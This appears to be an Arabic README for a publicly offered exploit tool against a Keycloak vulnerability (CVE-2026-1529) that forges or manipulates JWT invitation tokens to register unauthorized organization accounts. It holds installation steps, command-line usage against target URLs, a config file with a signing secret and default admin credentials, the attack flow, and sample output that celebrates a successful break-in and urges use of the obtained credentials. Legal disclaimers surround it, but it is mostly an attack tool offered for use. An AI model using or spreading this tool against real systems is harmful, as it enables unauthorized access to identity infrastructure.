
Keycloak: تسجيل مؤسسة غير مصرح به عبر التحقق غير السليم من رمز الدعوة
CVE-2026-1529: Keycloak - تسجيل مؤسسة غير مصرح به عبر التحقق غير السليم من رمز الدعوة
⚠️ تحذير: هذه الأداة مخصصة لأغراض الاختبار الأمني التعليمي والمصرح به فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.
توضح هذه الأداة ثغرة أمنية حرجة في Keycloak (CVE-2026-1529) تسمح بتسجيل مؤسسة غير مصرح به من خلال التحقق غير السليم من رمز دعوة JWT. يقوم الاستغلال بالتلاعب برموز الدعوة للحصول على وصول غير مصرح به إلى مثيلات Keycloak.
تفاصيل الثغرة:
# استنساخ المستودع
git clone https://github.com/yourusername/cve-2026-1529-exploit.git
cd cve-2026-1529-exploit
# إنشاء بيئة افتراضية
python3 -m venv venv
source venv/bin/activate # على Windows: venv\Scripts\activate
# تثبيت التبعيات
pip install -r requirements.txt
# إنشاء هيكل الدليل
mkdir -p keycloak-exploit/{utils,config,logs,output/reports}
cd keycloak-exploit
# تنزيل الملفات من الإصدارات أو نسخها يدويًا
# ثم تثبيت التبعيات
pip install requests urllib3 PyJWT
keycloak-exploit/
├── keycloak-exploit.py # سكربت الاستغلال الرئيسي
├── requirements.txt # تبعيات Python
├── README.md # هذا الملف
├── config/
│ └── default_config.json # ملف الإعدادات
├── utils/
│ ├── __init__.py # مُهيئ الحزمة
│ ├── http_utils.py # أدوات عميل HTTP
│ ├── jwt_utils.py # التلاعب بـ JWT
│ └── crypto_utils.py # أدوات التشفير
├── logs/ # سجلات مولدة تلقائيًا
└── output/
└── reports/ # تقارير الاستغلال
python3 keycloak-exploit.py https://target-keycloak.com
# مع رمز دعوة مخصص
python3 keycloak-exploit.py -t eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... https://target.com
# مع معرف مؤسسة مخصص
python3 keycloak-exploit.py -o custom_org_id https://target.com
# مع ملف إعدادات مخصص
python3 keycloak-exploit.py -c /path/to/config.json https://target.com
# تفعيل تسجيل التصحيح
python3 keycloak-exploit.py -d https://target.com
# عرض المساعدة
python3 keycloak-exploit.py -h
# عرض الإصدار
python3 keycloak-exploit.py -v
قم بتحرير config/default_config.json لتخصيص معلمات الاستغلال:
{
"exploit": {
"default_username": "admin_user_2026",
"default_password": "KeycloakCVE2026!",
"default_email": "[email protected]",
"timeout": 30,
"max_retries": 3
},
"jwt": {
"algorithm": "HS256",
"secret_key": "keycloak-cve-2026-1529-exploit",
"token_expiry": 3600
},
"target": {
"endpoints": {
"realms": "/realms",
"organizations": "/organizations",
"register": "/register",
"login": "/login"
}
},
"output": {
"log_level": "INFO",
"save_reports": true,
"report_format": "txt"
}
}
يعمل الاستغلال بالخطوات التالية:
فحص الثغرة
توليد/التلاعب بالرمز
تسجيل المستخدم
التحقق من تسجيل الدخول
توليد التقرير
output/reports/┌─────────────────┐
│ فحص الهدف │
└────────┬────────┘
│
▼
┌─────────────────┐
│ توليد/الحصول │
│ على الرمز │
└────────┬────────┘
│
▼
┌─────────────────┐
│ التلاعب بالرمز │
└────────┬────────┘
│
▼
┌─────────────────┐
│ تسجيل المستخدم │
└────────┬────────┘
│
▼
┌─────────────────┐
│ اختبار الدخول │
└────────┬────────┘
│
▼
┌─────────────────┐
│ توليد التقرير │
└─────────────────┘
============================================================
نتائج استغلال CVE-2026-1529
============================================================
✓ الهدف عرضة لثغرة CVE-2026-1529
🎯 الاستغلال ناجح!
اسم المستخدم: admin_user_2026
كلمة المرور: KeycloakCVE2026!
البريد الإلكتروني: [email protected]
رابط تسجيل الدخول: https://target.com/realms/master/account
📄 تم حفظ التقرير في: output/reports/exploit_report_20260211_050507.txt
🔐 استخدم بيانات الاعتماد المقدمة للوصول إلى مثيل Keycloak!
⚠️ هذا يوضح الوصول غير المصرح به بسبب CVE-2026-1529
============================================================
بواسطة f3ds cr3w est, 2002
============================================================
يتم حفظ تقرير مفصل في output/reports/ يتضمن:
يتم حفظ السجلات في دليل logs/ مع معلومات تنفيذ مفصلة.
الحل:
# تأكد من أنك في الدليل الصحيح
cd keycloak-exploit
python3 keycloak-exploit.py https://target.com
الحل:
# تأكد من وجود دليل config
mkdir -p config
# انسخ أو أنشئ default_config.json في config/
الحل: تم إصلاح هذا في أحدث إصدار. قم بتحديث urllib3:
pip install --upgrade urllib3
الأسباب المحتملة:
الحل:
# تفعيل تسجيل التصحيح لرؤية المزيد من التفاصيل
python3 keycloak-exploit.py -d https://target.com
الحل:
# زيادة المهلة في config/default_config.json
"timeout": 60
قم بتفعيل التسجيل التفصيلي لاستكشاف المشكلات:
python3 keycloak-exploit.py -d https://target.com
سيظهر هذا:
⚠️ إشعار قانوني مهم ⚠️
هذه الأداة مقدمة لأغراض الاختبار الأمني التعليمي والمصرح به فقط.
باستخدام هذه الأداة، فإنك توافق على أن:
1. ستستخدم هذه الأداة فقط على الأنظمة التي تمتلكها أو لديك إذن كتابي صريح
لاختبارها.
2. تدرك أن الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني
بموجب القوانين بما في ذلك على سبيل المثال لا الحصر:
- قانون الاحتيال وإساءة استخدام الكمبيوتر (CFAA) - الولايات المتحدة
- قانون إساءة استخدام الكمبيوتر - المملكة المتحدة
- تشريعات مماثلة في البلدان الأخرى
3. تتحمل المسؤولية الكاملة عن أي عواقب لاستخدام هذه الأداة.
4. المؤلفون والمساهمون غير مسؤولين عن أي إساءة استخدام أو ضرر
ناتج عن هذه الأداة.
5. هذه الأداة مقدمة "كما هي" دون أي ضمان من أي نوع.
استخدم على مسؤوليتك الخاصة. الوصول غير المصرح به جريمة.
المساهمات مرحب بها! يرجى اتباع هذه الإرشادات:
git checkout -b feature/improvement)git commit -am 'Add new feature')git push origin feature/improvement)# استنساخ نسختك
git clone https://github.com/yourusername/cve-2026-1529-exploit.git
cd cve-2026-1529-exploit
# إنشاء بيئة افتراضية
python3 -m venv venv
source venv/bin/activate
# تثبيت التبعيات
pip install -r requirements.txt
# قم بتغييراتك واختبرها
python3 keycloak-exploit.py https://test-target.com
تم الإنشاء بواسطة: f3ds cr3w est, 2002
للاستفسارات أو المشكلات أو المخاوف الأمنية:
تذكر: مارس دائمًا الإفصاح المسؤول والأخلاقيات في الاختراق. Ref: https://github.com/ninjazan420/CVE-2026-1529-PoC-keycloak-unauthorized-registration-via-improper-invitation-token-validation صُنع بـ ❤️ بواسطة f3ds cr3w est, 2002
| الوسيط | الاختصار | الوصف |
|---|
target | - | عنوان URL المستهدف لـ Keycloak (مطلوب) |
--token | -t | رمز دعوة مخصص |
--org-id | -o | معرف مؤسسة مخصص |
--config | -c | مسار ملف الإعدادات |
--debug | -d | تفعيل تسجيل التصحيح |
--version | -v | عرض معلومات الإصدار |
--help | -h | عرض رسالة المساعدة |
| القسم | المعلمة | الوصف | الافتراضي |
|---|
exploit | default_username | اسم المستخدم للتسجيل | admin_user_2026 |
exploit | default_password | كلمة المرور للتسجيل | KeycloakCVE2026! |
exploit | default_email | البريد الإلكتروني للتسجيل | [email protected] |
exploit | timeout | مهلة طلب HTTP (بالثواني) | 30 |
exploit | max_retries | الحد الأقصى لمحاولات HTTP | 3 |
jwt | algorithm | خوارزمية توقيع JWT | HS256 |
jwt | secret_key | المفتاح السري لـ JWT | مخصص |
jwt | token_expiry | انتهاء صلاحية الرمز (بالثواني) | 3600 |